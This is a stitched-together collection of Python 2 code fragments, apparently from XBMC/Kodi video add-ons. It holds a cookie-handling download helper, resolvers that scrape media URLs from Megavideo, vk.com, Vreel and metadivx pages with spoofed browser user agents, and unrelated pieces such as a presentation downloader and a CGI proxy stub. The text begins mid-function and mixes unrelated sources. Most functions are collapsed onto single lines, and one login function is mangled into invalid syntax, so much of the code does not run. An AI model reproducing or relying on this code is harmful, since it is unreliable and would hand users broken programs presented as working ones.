                os.remove(ficherocookies)
        # Install the jar in the opener used for fetching URLs.
        if cookielib is not None:
            logger.info("[scrapertools.py] opener usando urllib2 (cookielib)")
            if not follow_redirects:
                opener = urllib2.build_opener(urllib2.HTTPHandler(debuglevel=DEBUG_LEVEL),urllib2.HTTPCookieProcessor(cj),NoRedirectHandler())
            else:
                opener = urllib2.build_opener(urllib2.HTTPHandler(debuglevel=DEBUG_LEVEL),urllib2.HTTPCookieProcessor(cj))
            urllib2.install_opener(opener)
        else:
            logger.info("[scrapertools.py] opener usando ClientCookie")
            opener = ClientCookie.build_opener(ClientCookie.HTTPCookieProcessor(cj))
            ClientCookie.install_opener(opener)
    # -------------------------------------------------
    # Cookies installed; fire the request.
    # -------------------------------------------------
    inicio = time.clock()   # timing counter
    txheaders = {}          # request headers dictionary
    if post is None:
        logger.info("[scrapertools.py] petición GET")
    else:
        logger.info("[scrapertools.py] petición POST")
    # Add the caller-supplied headers.
    logger.info("[scrapertools.py] ---------------------------")
    for header in headers:
        logger.info("[scrapertools.py] header %s=%s" % (str(header[0]),str(header[1])) )
        txheaders[header[0]]=header[1]
    logger.info("[scrapertools.py] ---------------------------")
    req = Request(url, post, txheaders)
    try:
        if timeout is None:
            handle=urlopen(req)
        else:
            # Works on all versions: set the per-call timeout globally,
            # then restore the previous process default.
            deftimeout = socket.getdefaulttimeout()
            socket.setdefaulttimeout(timeout)
            handle=urlopen(req)
            socket.setdefaulttimeout(deftimeout)
        # Persist any cookies the server set.
        cj.save(ficherocookies)
        # Read the body, transparently gunzipping when needed.
        if handle.info().get('Content-Encoding') == 'gzip':
            logger.info("[scrapertools.py] gzipped")
            fin = inicio
            import StringIO
            data=handle.read()
            compressedstream = StringIO.StringIO(data)
            import gzip
            gzipper = gzip.GzipFile(fileobj=compressedstream)
            data = gzipper.read()
            gzipper.close()
            fin = time.clock()
        else:
            logger.info("[scrapertools.py] normal")
            data = handle.read()
    except urllib2.HTTPError,e:
        # Return the error body rather than raising.
        logger.info("error "+repr(e))
        import traceback
        traceback.print_exc()
        data = e.read()
    #logger.info("data="+repr(data))
    return data
def getLoginURLDataResponse(url):
    """Open *url* through ClientCookie, sending Referer and an IE user agent."""
    req = urllib2.Request(url)
    req.add_header('Referer', url)
    req.add_header('User-Agent', 'Mozilla/4.0 (compatible;)')
    return ClientCookie.urlopen(req)
def GetMegavideoUser(login, password, megavidcookiepath):
    """Log in to Megavideo and return the user token scraped from the
    resulting cookie data.

    NOTE(review): part of this function was mangled at extraction time
    (see below), so the login POST / response handling is incomplete.
    """
    #New Login code derived from old code by Voinage etc. Makes no need for mechanize module.
    #if no user or pass are provided, open login file to get them.
    # NOTE(review): `self.login` inside a plain function will raise
    # NameError if this branch runs — confirm against the original project.
    if login is False or password is False:
        if os.path.exists(megavidcookiepath):
            loginf = openfile(self.login)
            login = get_user(loginf)
            password = get_pass(loginf)
    # ---------------------------------------
    # Cookie stuff
    # ---------------------------------------
    ficherocookies = megavidcookiepath # the path and filename to save your cookies in
    cj = None
    ClientCookie = None
    cookielib = None
    # Prefer stdlib cookielib; fall back to ClientCookie; else no cookies.
    try:
        import cookielib
    except ImportError:
        try:
            import ClientCookie
        except ImportError:
            # ClientCookie isn't available either
            urlopen = urllib2.urlopen
            Request = urllib2.Request
        else:
            # imported ClientCookie
            urlopen = ClientCookie.urlopen
            Request = ClientCookie.Request
            cj = ClientCookie.LWPCookieJar()
    else:
        # importing cookielib worked
        urlopen = urllib2.urlopen
        Request = urllib2.Request
        cj = cookielib.LWPCookieJar()  # FileCookieJar with load/save
    # ---------------------------------
    # install the cookies
    # ---------------------------------
    if cj is not None:
        if os.path.isfile(ficherocookies):
            # load previously saved cookies into the jar
            cj.load(ficherocookies)
        if cookielib is not None:
            opener = urllib2.build_opener(urllib2.HTTPCookieProcessor(cj))
            urllib2.install_opener(opener)
        else:
            opener = ClientCookie.build_opener( ClientCookie.HTTPCookieProcessor(cj))
            ClientCookie.install_opener(opener)
    url = "http://www.megavideo.com/?s=signup"
    theurl = url
    # NOTE(review): the next line was mangled at extraction time — the
    # "******" run redacted the password concatenation and swallowed the
    # request/response code that defined `cookiedata` and `patronvideos`.
    # Left byte-for-byte as found; it is NOT valid Python as-is.
    txdata = "action=login&cnext=&snext=&touser=&user=&nickname=" + login + "&password="******"([^"]+)"'
    matches = re.compile(patronvideos, re.DOTALL).findall(cookiedata)
    if len(matches) == 0:
        # Fall back to the unquoted `user=...;` cookie form.
        patronvideos = 'user=([^\;]+);'
        matches = re.compile(patronvideos, re.DOTALL).findall(cookiedata)
    if len(matches) == 0:
        print 'something bad happened'
    return matches[0]
# vk.com video URL resolver: deletes any stale cookie file, installs a
# cookie-aware opener, fetches the page with a desktop IE7 User-Agent, then
# extracts ``vkid`` and the ``var video_host/uid/vtag/no_flv/max_hd`` block to
# assemble the final media URL (plain .flv, vkadre.ru asset .flv, or .360.mp4).
# NOTE(review): source is whitespace-collapsed; statements are preserved
# byte-for-byte and comments are only added at physical-line boundaries (a
# comment is split across the two original lines, so none is inserted between
# them).  The bare ``except: pass`` around os.remove() is best-effort cleanup.
def geturl(urlvideo): xbmc.output("[vk.py] url=" + urlvideo) # --------------------------------------- # Inicializa la libreria de las cookies # --------------------------------------- ficherocookies = COOKIEFILE try: os.remove(ficherocookies) except: pass # the path and filename to save your cookies in cj = None ClientCookie = None cookielib = None # Let's see if cookielib is available try: import cookielib except ImportError: # If importing cookielib fails # let's try ClientCookie try: import ClientCookie except ImportError: # ClientCookie isn't available either urlopen = urllib2.urlopen Request = urllib2.Request else: # imported ClientCookie urlopen = ClientCookie.urlopen Request = ClientCookie.Request cj = ClientCookie.LWPCookieJar() else: # importing cookielib worked urlopen = urllib2.urlopen Request = urllib2.Request cj = cookielib.LWPCookieJar() # This is a subclass of FileCookieJar # that has useful load and save methods # --------------------------------- # Instala las cookies # --------------------------------- if cj is not None: # we successfully imported # one of the two cookie handling modules if os.path.isfile(ficherocookies): # if we have a cookie file already saved # then load the cookies into the Cookie Jar cj.load(ficherocookies) # Now we need to get our Cookie Jar # installed in the opener; # for fetching URLs if cookielib is not None: # if we use cookielib # then we get the HTTPCookieProcessor # and install the opener in urllib2 opener = urllib2.build_opener(urllib2.HTTPCookieProcessor(cj)) urllib2.install_opener(opener) else: # if we use ClientCookie # then we get the HTTPCookieProcessor # and install the opener in ClientCookie opener = ClientCookie.build_opener( ClientCookie.HTTPCookieProcessor(cj)) ClientCookie.install_opener(opener) #print "-------------------------------------------------------" url = urlvideo.replace("&amp;", "&") #print url #print "-------------------------------------------------------" theurl = url # an example url that 
sets a cookie, # try different urls here and see the cookie collection you can make ! txdata = None # if we were making a POST type request, # we could encode a dictionary of values here, # using urllib.urlencode(somedict) txheaders = { 'User-Agent': 'Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506)' } # fake a user agent, some websites (like google) don't like automated exploration req = Request(theurl, txdata, txheaders) handle = urlopen(req) cj.save(ficherocookies) # save the cookies again data = handle.read() handle.close() #print data # Extrae la URL print data regexp = re.compile(r'vkid=([^\&]+)\&') match = regexp.search(data) vkid = "" print 'match %s' % str(match) if match is not None: vkid = match.group(1) else: print "no encontro vkid" patron = "var video_host = '([^']+)'.*?" patron += "var video_uid = '([^']+)'.*?" patron += "var video_vtag = '([^']+)'.*?" patron += "var video_no_flv = ([^;]+);.*?" patron += "var video_max_hd = '([^']+)'" matches = re.compile(patron, re.DOTALL).findall(data) if len(matches) > 0: for match in matches: if match[3].strip() == "0" and match[1] != "0": tipo = "flv" if "http://" in match[0]: videourl = "%s/u%s/video/%s.%s" % (match[0], match[1], match[2], tipo) else: videourl = "http://%s/u%s/video/%s.%s" % ( match[0], match[1], match[2], tipo) elif match[ 1] == "0" and vkid != "": #http://447.gt3.vkadre.ru/assets/videos/2638f17ddd39-75081019.vk.flv tipo = "flv" if "http://" in match[0]: videourl = "%s/assets/videos/%s%s.vk.%s" % ( match[0], match[2], vkid, tipo) else: videourl = "http://%s/assets/videos/%s%s.vk.%s" % ( match[0], match[2], vkid, tipo) else: #http://cs12385.vkontakte.ru/u88260894/video/d09802a95b.360.mp4 tipo = "360.mp4" if match[0].endswith("/"): videourl = "%su%s/video/%s.%s" % (match[0], match[1], match[2], tipo) else: videourl = "%s/u%s/video/%s.%s" % (match[0], match[1], match[2], tipo) return videourl
# Cached HTTP retrieval with progress callbacks.
# Honours ETag / Last-Modified (a 304 serves the cached local file), streams
# the body in 8 KiB chunks reporting progress via self.onDataRetrieved (whose
# falsy return cancels the download), and writes a metadata side-file
# describing the cache entry.  Returns the local file path, or None when the
# download was cancelled/failed (the partial file is removed).
# NOTE(review): whitespace-collapsed source; statements preserved byte-for-byte,
# comments only added at safe physical-line boundaries (a comment spans the
# last two original lines, so none is inserted between them).
def urlretrieve(self,url,cachetime=None,localfile=None,ext=None,postdata=None): url=self.getFullUrl(url) urlmetafile=self.url2cachemetafile(url) if cachetime is None: cachetime=self.defaultCachetime metainfo = self.getCacheMeta(urlmetafile) furl=None fcache=None isDownloadCompleted=False try: self.onDataRetrieved(0, None, url, '') oldtimeout=socket.getdefaulttimeout() socket.setdefaulttimeout(self.socketTimeout) authurl=parseAuthUrl(url) if len(authurl[1])>0: #todo use HTTPBasicAuthHandler instead.... url=authurl[0] base64string=base64.encodestring('%s:%s' % (authurl[1],authurl[2]))[:-1] authheader = "Basic %s" % base64string request = ClientCookie.Request(url) request.add_header('User-Agent',self.userAgent) if len(authurl[1])>0: request.add_header("Authorization", authheader) #if len(self.urlContext)>0: #TODO: not always # request.add_header('Referer',self.urlContext) request.add_header('Referer',url.split( '?' )[0]) request.add_header('Cookie','clientSupportsCookies=YES') # ClientCookie doesn't set this? 
# Conditional-GET headers and the 304 fast path follow.
# NOTE(review): the 304 branch reads metainfo['CM-UrlContext'] (capital U)
# while the writer at the end of this function stores 'CM-urlContext'
# (lower-case u); if the meta-file storage is case-sensitive this lookup can
# never succeed -- confirm which spelling the rest of the module uses before
# changing either.  The bare ``except: pass`` clauses deliberately skip
# missing ETag/Last-Modified entries.
if not (metainfo is None): try: etag=metainfo['ETag'] request.add_header('If-None-Match', etag) except: pass try: lastmodified = metainfo['Last-Modified'] request.add_header('If-Modified-Since', lastmodified) except: pass furl=self.opener.open(request,postdata) info=furl.info() if not (metainfo is None): if hasattr(furl, 'code') and furl.code == 304: self.urlContext=metainfo['CM-UrlContext'] temp=os.path.split(metainfo['CM-Localfile']) print('using cache: '+temp[1]) isDownloadCompleted=True if not (localfile is None): nameext=os.path.splitext(metainfo['CM-Localfile']) if not (localfile.lower()==nameext[0].lower()): localfile=localfile+nameext[1] shutil.copyfile(metainfo['CM-Localfile'],localfile) return localfile return metainfo['CM-Localfile'] else: self.flushCache(url) try: totalSize=int(info['Content-Length']) except: totalSize=None #------------ construct local file name --------- xfname=os.path.splitext(urltoxfilename(url)) #tuple: suggested (filename,ext) xfname=[xfname[0],xfname[1]] #otherwise you cannot write to it try: try: old_xfname = xfname filename = info['Content-Disposition'].split( '\"' )[1] xfname = os.path.splitext( filename ) except: xfname[0] = old_xfname[0] mimetype=info['Content-Type'].split(';') # also understand "Content-Type: text/html; charset=utf-8" mimetype=mimetype[0].strip() mimeext=mimetypes.guess_extension(mimetype) if (not (mimeext is None)) and (len(mimeext)>0): if mimeext=='.m1v': mimeext='.mpg' xfname[1]=mimeext #override the one based on url alone except: pass if not (ext is None): xfname[1]=ext #override with manual extension ext=xfname[1] xfname=xfname[0] if len(ext)>0: if not (ext[0]=='.'): ext='.'+ext ext=ext[0:7] #do not allow so long extensions... 
Just truncate if localfile is None: #then autogenerate a file name for the cache localfile=self.cacheFolder+xfname+ext i=1 while fileExists(localfile): i=min(i*10,100000) #add a random number to minimize fileexist checks localfile=self.cacheFolder+xfname[0:30]+'['+str(random.randint(0,i-1))+']'+ext else: localfile=localfile+ext #------------------------------------------------ fcache=file(localfile,'wb') iscanceled=not self.onDataRetrieved(0, totalSize, url, localfile) data='...' blockSize=8192 pval=0 while len(data)>0: if not totalSize is None: if pval>totalSize: totalSize=pval*2 data = furl.read(blockSize) pval=pval+len(data) if len(data)>0: fcache.write(data) if len(data)<blockSize: break iscanceled=not self.onDataRetrieved(pval, totalSize, url, localfile) if iscanceled: break isDownloadCompleted=not iscanceled self.urlContext=furl.url finally: self.onDownloadFinished(isDownloadCompleted) try: if not fcache is None: fcache.close() if not furl is None: furl.close() socket.setdefaulttimeout(oldtimeout) if not isDownloadCompleted: os.remove(localfile) except: pass if not isDownloadCompleted: return None #------------- write url meta file ------------ #TODO: maybe do something if info['cache-control']=private? info['Content-Length']=str(pval) info['CM-Localfile']=localfile info['CM-urlContext']=self.urlContext info['CM-CacheTime']=str(cachetime) info['CM-TimeStamp']=str(time.time()) info['CM-url']=url fuc=file(urlmetafile,'wb') fuc.write(str(info)) fuc.close() return localfile
# Central GET/POST helper of the scraper module.  Installs a persistent cookie
# jar (cookielib preferred, ClientCookie as fallback), sends the request with
# the caller-supplied header pairs, saves cookies back to disk, logs the
# response headers and returns the body.
# NOTE(review): ``headers`` uses a mutable default argument (list of lists) --
# shared across calls; harmless only as long as no caller mutates it.
# NOTE(review): whitespace-collapsed source; statements preserved byte-for-byte.
def downloadpage( url, post=None, headers=[[ 'User-Agent', 'Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.6; es-ES; rv:1.9.2.12) Gecko/20101026 Firefox/3.6.12' ]], follow_redirects=True, timeout=socket.getdefaulttimeout()): logger.info("[scrapertools.py] downloadpage") logger.info("[scrapertools.py] url=" + url) if post is not None: logger.info("[scrapertools.py] post=" + post) else: logger.info("[scrapertools.py] post=None") # --------------------------------- # Instala las cookies # --------------------------------- # Inicializa la librería de las cookies ficherocookies = os.path.join(config.get_setting("cookies.dir"), 'cookies.lwp') logger.info("[scrapertools.py] ficherocookies=" + ficherocookies) cj = None ClientCookie = None cookielib = None # Let's see if cookielib is available try: logger.info("[scrapertools.py] Importando cookielib") import cookielib except ImportError: logger.info("[scrapertools.py] cookielib no disponible") # If importing cookielib fails # let's try ClientCookie try: logger.info("[scrapertools.py] Importando ClientCookie") import ClientCookie except ImportError: logger.info("[scrapertools.py] ClientCookie no disponible") # ClientCookie isn't available either urlopen = urllib2.urlopen Request = urllib2.Request else: logger.info("[scrapertools.py] ClientCookie disponible") # imported ClientCookie urlopen = ClientCookie.urlopen Request = ClientCookie.Request cj = ClientCookie.LWPCookieJar() else: logger.info("[scrapertools.py] cookielib disponible") # importing cookielib worked urlopen = urllib2.urlopen Request = urllib2.Request cj = cookielib.LWPCookieJar() # This is a subclass of FileCookieJar # that has useful load and save methods if cj is not None: # we successfully imported # one of the two cookie handling modules logger.info("[scrapertools.py] Hay cookies") if os.path.isfile(ficherocookies): logger.info("[scrapertools.py] Leyendo fichero cookies") # if we have a cookie file already saved # then load the cookies into the Cookie Jar try: 
# An unreadable cookie file is deleted and the request proceeds without it.
# The opener optionally includes NoRedirectHandler when follow_redirects is
# False.  NOTE(review): in the pre-Python-2.6 timeout fallback at the end of
# this line, if ``urlopen`` raises, ``handle`` is never bound and the later
# ``handle.read()`` raises NameError -- the bare except only logs exc_info.
cj.load(ficherocookies) except: logger.info( "[scrapertools.py] El fichero de cookies existe pero es ilegible, se borra" ) os.remove(ficherocookies) # Now we need to get our Cookie Jar # installed in the opener; # for fetching URLs if cookielib is not None: logger.info("[scrapertools.py] opener usando urllib2 (cookielib)") # if we use cookielib # then we get the HTTPCookieProcessor # and install the opener in urllib2 if not follow_redirects: opener = urllib2.build_opener( urllib2.HTTPHandler(debuglevel=DEBUG_LEVEL), urllib2.HTTPCookieProcessor(cj), NoRedirectHandler()) else: opener = urllib2.build_opener( urllib2.HTTPHandler(debuglevel=DEBUG_LEVEL), urllib2.HTTPCookieProcessor(cj)) urllib2.install_opener(opener) else: logger.info("[scrapertools.py] opener usando ClientCookie") # if we use ClientCookie # then we get the HTTPCookieProcessor # and install the opener in ClientCookie opener = ClientCookie.build_opener( ClientCookie.HTTPCookieProcessor(cj)) ClientCookie.install_opener(opener) # ------------------------------------------------- # Cookies instaladas, lanza la petición # ------------------------------------------------- # Contador inicio = time.clock() # Diccionario para las cabeceras txheaders = {} # Construye el request if post is None: logger.info("[scrapertools.py] petición GET") else: logger.info("[scrapertools.py] petición POST") # Añade las cabeceras logger.info("[scrapertools.py] ---------------------------") for header in headers: logger.info("[scrapertools.py] header %s=%s" % (str(header[0]), str(header[1]))) txheaders[header[0]] = header[1] logger.info("[scrapertools.py] ---------------------------") req = Request(url, post, txheaders) if timeout is None: handle = urlopen(req) else: #Disponible en python 2.6 en adelante --> handle = urlopen(req, timeout=timeout) #Para todas las versiones: deftimeout = socket.getdefaulttimeout() try: socket.setdefaulttimeout(timeout) handle = urlopen(req) except: import sys for line in sys.exc_info(): 
# Response handling: save cookies, read body, log headers, time the download.
# The triple-quoted block below is a dead retry variant kept for reference.
logger.error("%s" % line) socket.setdefaulttimeout(deftimeout) # Actualiza el almacén de cookies cj.save(ficherocookies) # Lee los datos y cierra data = handle.read() info = handle.info() logger.info("[scrapertools.py] Respuesta") logger.info("[scrapertools.py] ---------------------------") for header in info: logger.info("[scrapertools.py] " + header + "=" + info[header]) handle.close() logger.info("[scrapertools.py] ---------------------------") ''' # Lanza la petición try: response = urllib2.urlopen(req) # Si falla la repite sustituyendo caracteres especiales except: req = urllib2.Request(url.replace(" ","%20")) # Añade las cabeceras for header in headers: req.add_header(header[0],header[1]) response = urllib2.urlopen(req) ''' # Tiempo transcurrido fin = time.clock() logger.info("[scrapertools.py] Descargado en %d segundos " % (fin - inicio + 1)) return data
def do_login_and_fetch(self, cj, COOKIEFILE, LOGIN_URL, login_params, fetch_url, save_to, **args): """ Method to do an automated login and save the cookie. This is required for presentation download. """ ClientCookie = None cookielib = None # Properly import the correct cookie lib try: import http.cookiejar except ImportError: # If importing cookielib fails # let's try ClientCookie try: import ClientCookie except ImportError: # ClientCookie isn't available either urlopen = urllib.request.urlopen Request = urllib.request.Request else: # imported ClientCookie urlopen = ClientCookie.urlopen Request = ClientCookie.Request cj = ClientCookie.LWPCookieJar() else: # importing cookielib worked urlopen = urllib.request.urlopen Request = urllib.request.Request cj = http.cookiejar.LWPCookieJar() if cj is not None: if os.path.isfile(COOKIEFILE): cj.load(COOKIEFILE) if cookielib is not None: opener = urllib.request.build_opener( urllib.request.HTTPCookieProcessor(cj)) urllib.request.install_opener(opener) else: opener = ClientCookie.build_opener( ClientCookie.HTTPCookieProcessor(cj)) ClientCookie.install_opener(opener) headers = { 'User-agent': 'Mozilla/4.0 (compatible; MSIE 5.5; Windows NT)' } request = Request(LOGIN_URL, login_params, headers) handle = urlopen(request) if cj: cj.save(COOKIEFILE) request = Request(fetch_url, None, headers) try: handle = urlopen(request) except urllib.error.HTTPError: print('Presentation not available for download!', file=sys.stderr) return data = handle.read() info = handle.info() ext = 'ppt' type = info['Content-Type'] ext = self.get_extension(type) if not save_to: save_to = fetch_url.split('/')[-2] + '.' save_to = save_to + ext fp = open(save_to, 'wb') fp.write(data) fp.close() if self.verbose: print('Presentation downloaded and saved to %s' % save_to)
except: pass import os, sys, cgi, pickle from time import strftime import urllib2 sys.stderr = sys.stdout READSIZE = 4000 COOKIEFILE = 'cookies.lwp' try: import ClientCookie openfun = ClientCookie.urlopen reqfun = ClientCookie.Request cj = ClientCookie.LWPCookieJar() if os.path.isfile(COOKIEFILE): cj.load(COOKIEFILE) opener = ClientCookie.build_opener(ClientCookie.HTTPCookieProcessor(cj)) ClientCookie.install_opener(opener) except: ClientCookie = None openfun = urllib2.urlopen reqfun = urllib2.Request ############################################################### # Nicked from BaseHTTPServer # This is the basic table of HTTP errors errorlist = { 400: ('Bad Request', 'The Server thinks your request was malformed.'),
# Gzip-aware page fetch: same cookie-jar setup as downloadpage(), but the
# request advertises ``Accept-Encoding: gzip,deflate`` and the response body is
# gunzipped; if decompression fails the raw bytes are returned unchanged.
# NOTE(review): whitespace-collapsed source; statements preserved byte-for-byte.
def downloadpageGzip(url): # Inicializa la librería de las cookies ficherocookies = os.path.join(config.get_data_path(), 'cookies.lwp') logger.info("Cookiefile=" + ficherocookies) inicio = time.clock() cj = None ClientCookie = None cookielib = None # Let's see if cookielib is available try: import cookielib except ImportError: # If importing cookielib fails # let's try ClientCookie try: import ClientCookie except ImportError: # ClientCookie isn't available either urlopen = urllib2.urlopen Request = urllib2.Request else: # imported ClientCookie urlopen = ClientCookie.urlopen Request = ClientCookie.Request cj = ClientCookie.LWPCookieJar() else: # importing cookielib worked urlopen = urllib2.urlopen Request = urllib2.Request cj = cookielib.LWPCookieJar() # This is a subclass of FileCookieJar # that has useful load and save methods # --------------------------------- # Instala las cookies # --------------------------------- if cj is not None: # we successfully imported # one of the two cookie handling modules if os.path.isfile(ficherocookies): # if we have a cookie file already saved # then load the cookies into the Cookie Jar try: cj.load(ficherocookies) except: logger.info( "[scrapertools.py] El fichero de cookies existe pero es ilegible, se borra" ) os.remove(ficherocookies) # Now we need to get our Cookie Jar # installed in the opener; # for fetching URLs if cookielib is not None: # if we use cookielib # then we get the HTTPCookieProcessor # and install the opener in urllib2 opener = urllib2.build_opener(urllib2.HTTPCookieProcessor(cj)) urllib2.install_opener(opener) else: # if we use ClientCookie # then we get the HTTPCookieProcessor # and install the opener in ClientCookie opener = ClientCookie.build_opener( ClientCookie.HTTPCookieProcessor(cj)) ClientCookie.install_opener(opener) #print "-------------------------------------------------------" theurl = url # an example url that sets a cookie, # try different urls here and see the cookie collection you can make ! 
# Builds a browser-like header set (Referer = scheme://host of the target),
# performs the GET, then inflates the body with gzip.GzipFile over a StringIO
# buffer.  The bare ``except: return data`` is the deliberate non-gzip
# fallback.  NOTE(review): ``import httplib`` below appears unused here.
#txheaders = {'User-Agent':'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.9.0.3) Gecko/2008092417 Firefox/3.0.3', # 'Referer':'http://www.megavideo.com/?s=signup'} import httplib parsedurl = urlparse.urlparse(url) logger.info("parsedurl=" + str(parsedurl)) txheaders = { 'User-Agent': 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.9.0.3) Gecko/2008092417 Firefox/3.0.3', 'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8', 'Accept-Language': 'es-es,es;q=0.8,en-us;q=0.5,en;q=0.3', 'Accept-Charset': 'ISO-8859-1,utf-8;q=0.7,*;q=0.7', 'Accept-Encoding': 'gzip,deflate', 'Keep-Alive': '300', 'Connection': 'keep-alive', 'Referer': parsedurl[0] + "://" + parsedurl[1] } logger.info(str(txheaders)) # fake a user agent, some websites (like google) don't like automated exploration req = Request(theurl, None, txheaders) handle = urlopen(req) cj.save(ficherocookies) # save the cookies again data = handle.read() handle.close() fin = time.clock() logger.info("[scrapertools.py] Descargado 'Gzipped data' en %d segundos " % (fin - inicio + 1)) # Descomprime el archivo de datos Gzip try: fin = inicio import StringIO compressedstream = StringIO.StringIO(data) import gzip gzipper = gzip.GzipFile(fileobj=compressedstream) data1 = gzipper.read() gzipper.close() fin = time.clock() logger.info( "[scrapertools.py] 'Gzipped data' descomprimido en %d segundos " % (fin - inicio + 1)) return data1 except: return data
# Vreel resolver: primes a fresh cookie jar, fetches the page twice (the
# second identical request simulates the user clicking through the banner so
# the real link is served) and returns the first ne.edgecastcdn.net media URL
# found in the page.
# NOTE(review): whitespace-collapsed source; statements preserved byte-for-byte.
def Vreel(urlvideo): # --------------------------------------- # Inicializa la libreria de las cookies # --------------------------------------- ficherocookies = COOKIEFILE try: os.remove(ficherocookies) except: pass xbmc.output("ficherocookies %s", ficherocookies) # the path and filename to save your cookies in cj = None ClientCookie = None cookielib = None # Let's see if cookielib is available try: import cookielib except ImportError: # If importing cookielib fails # let's try ClientCookie try: import ClientCookie except ImportError: # ClientCookie isn't available either urlopen = urllib2.urlopen Request = urllib2.Request else: # imported ClientCookie urlopen = ClientCookie.urlopen Request = ClientCookie.Request cj = ClientCookie.LWPCookieJar() else: # importing cookielib worked urlopen = urllib2.urlopen Request = urllib2.Request cj = cookielib.LWPCookieJar() # This is a subclass of FileCookieJar # that has useful load and save methods # --------------------------------- # Instala las cookies # --------------------------------- if cj is not None: # we successfully imported # one of the two cookie handling modules if os.path.isfile(ficherocookies): # if we have a cookie file already saved # then load the cookies into the Cookie Jar cj.load(ficherocookies) # Now we need to get our Cookie Jar # installed in the opener; # for fetching URLs if cookielib is not None: # if we use cookielib # then we get the HTTPCookieProcessor # and install the opener in urllib2 opener = urllib2.build_opener(urllib2.HTTPCookieProcessor(cj)) urllib2.install_opener(opener) else: # if we use ClientCookie # then we get the HTTPCookieProcessor # and install the opener in ClientCookie opener = ClientCookie.build_opener(ClientCookie.HTTPCookieProcessor(cj)) ClientCookie.install_opener(opener) #print "-------------------------------------------------------" url=urlvideo #print url #print "-------------------------------------------------------" theurl = url # an example url that sets a cookie, 
# Two identical GETs with a fixed Firefox UA and vreel.net Referer; cookies
# are saved after each.  NOTE(review): raises IndexError when no CDN URL is
# found (matches[0] on an empty list) -- presumably callers treat that as
# "video gone"; confirm before hardening.
# try different urls here and see the cookie collection you can make ! txdata = None # if we were making a POST type request, # we could encode a dictionary of values here, # using urllib.urlencode(somedict) txheaders = {'User-Agent':'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.9.0.3) Gecko/2008092417 Firefox/3.0.3', 'Referer':'http://beta.vreel.net/'} # fake a user agent, some websites (like google) don't like automated exploration req = Request(theurl, txdata, txheaders) handle = urlopen(req) cj.save(ficherocookies) # save the cookies again data=handle.read() handle.close() #print data # Lo pide una segunda vez, como si hubieras hecho click en el banner req = Request(theurl, txdata, txheaders) handle = urlopen(req) cj.save(ficherocookies) # save the cookies again data=handle.read() handle.close() #print data patronvideos = '"(http\://ne.edgecastcdn.net[^"]+)"' matches = re.compile(patronvideos,re.DOTALL).findall(data) return matches[0]
def ping_url(url, n=1): request = ClientCookie.Request(url) for i in xrange(0,n): response = ClientCookie.urlopen(request)
# metadivx resolver: primes cookies, GETs the page, then re-POSTs the site's
# download form (op=download1, id/fname parsed from the URL itself) and
# unpacks the packed JavaScript player block to extract the real DivX/AVI
# media URL from the embedded <param name="src"...> value.
# NOTE(review): whitespace-collapsed source; statements preserved byte-for-byte.
# The long triple-quoted blocks further down are the original author's
# reference copies of the packed/unpacked JavaScript -- they span the
# remaining physical lines, so no comments are inserted between those lines.
def geturl(urlvideo): xbmc.output("[metadivx.py] url=" + urlvideo) # --------------------------------------- # Inicializa la libreria de las cookies # --------------------------------------- ficherocookies = COOKIEFILE try: os.remove(ficherocookies) except: pass # the path and filename to save your cookies in cj = None ClientCookie = None cookielib = None # Let's see if cookielib is available try: import cookielib except ImportError: # If importing cookielib fails # let's try ClientCookie try: import ClientCookie except ImportError: # ClientCookie isn't available either urlopen = urllib2.urlopen Request = urllib2.Request else: # imported ClientCookie urlopen = ClientCookie.urlopen Request = ClientCookie.Request cj = ClientCookie.LWPCookieJar() else: # importing cookielib worked urlopen = urllib2.urlopen Request = urllib2.Request cj = cookielib.LWPCookieJar() # This is a subclass of FileCookieJar # that has useful load and save methods # --------------------------------- # Instala las cookies # --------------------------------- if cj is not None: # we successfully imported # one of the two cookie handling modules if os.path.isfile(ficherocookies): # if we have a cookie file already saved # then load the cookies into the Cookie Jar cj.load(ficherocookies) # Now we need to get our Cookie Jar # installed in the opener; # for fetching URLs if cookielib is not None: # if we use cookielib # then we get the HTTPCookieProcessor # and install the opener in urllib2 opener = urllib2.build_opener(urllib2.HTTPCookieProcessor(cj)) urllib2.install_opener(opener) else: # if we use ClientCookie # then we get the HTTPCookieProcessor # and install the opener in ClientCookie opener = ClientCookie.build_opener( ClientCookie.HTTPCookieProcessor(cj)) ClientCookie.install_opener(opener) #print "-------------------------------------------------------" url = urlvideo #print url #print "-------------------------------------------------------" theurl = url # an example url that sets a cookie, 
# First GET, then the form re-POST built from the id/fname captured out of the
# original URL; the packed <script> inside div#embedcontmvshre is extracted.
# try different urls here and see the cookie collection you can make ! txdata = None # if we were making a POST type request, # we could encode a dictionary of values here, # using urllib.urlencode(somedict) txheaders = { 'User-Agent': 'Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506)' } # fake a user agent, some websites (like google) don't like automated exploration req = Request(theurl, txdata, txheaders) handle = urlopen(req) cj.save(ficherocookies) # save the cookies again data = handle.read() handle.close() #print data # Lo pide una segunda vez, como si hubieras hecho click en el banner patron = 'http\:\/\/www\.metadivx\.com/([^\/]+)/(.*?)\.html' matches = re.compile(patron, re.DOTALL).findall(url) xbmc.output("[metadivx.py] fragmentos de la URL") scrapertools.printMatches(matches) codigo = "" nombre = "" if len(matches) > 0: codigo = matches[0][0] nombre = matches[0][1] txdata = "op=download1&usr_login=&id=" + codigo + "&fname=" + nombre + "&referer=&method_free=Continue" xbmc.output(txdata) req = Request(theurl, txdata, txheaders) handle = urlopen(req) cj.save(ficherocookies) # save the cookies again data = handle.read() handle.close() #print data patron = '<div id="embedcontmvshre[^>]+>(.*?)</div>' matches = re.compile(patron, re.DOTALL).findall(data) scrapertools.printMatches(matches) xbmc.output("[metadivx.py] bloque packed") if len(matches) > 0: xbmc.output(matches[0]) ''' <center> <script type='text/javascript'>eval(function(p,a,c,k,e,d){while(c--)if(k[c])p=p.replace(new RegExp('\\b'+c.toString(a)+'\\b','g'),k[c]);return p}('1e.1d(\'<7 w="1c"1b="1a:19-18-17-16-15"h="g"f="e"14="4://a.6.3/9/13.12"><2 1="j"0="i"><2 